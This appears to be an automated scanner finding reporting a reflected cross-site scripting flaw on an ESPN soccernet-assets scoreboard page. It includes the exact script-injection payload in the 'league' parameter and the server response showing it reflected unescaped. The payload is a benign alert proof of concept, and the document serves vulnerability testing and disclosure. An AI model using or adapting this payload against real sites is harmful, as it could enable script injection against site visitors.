1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://soccernet-assets |
Path: | /scoreboard |
GET /scoreboard?league=alla75af"><script>alert(1)< Host: soccernet-assets.espn.go Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sun, 07 Nov 2010 22:16:19 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN35 Cache-Expires: Sun, 07 Nov 2010 22:17:34 GMT X-UA-Compatible: IE=EmulateIE7 Cache-Control: max-age=74 Date: Sun, 07 Nov 2010 22:16:22 GMT Connection: close Connection: Transfer-Encoding Content-Length: 601566 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script>/*c: null*/functi ...[SNIP]... <a href="?league=alla75af"><script>alert(1)< ...[SNIP]... |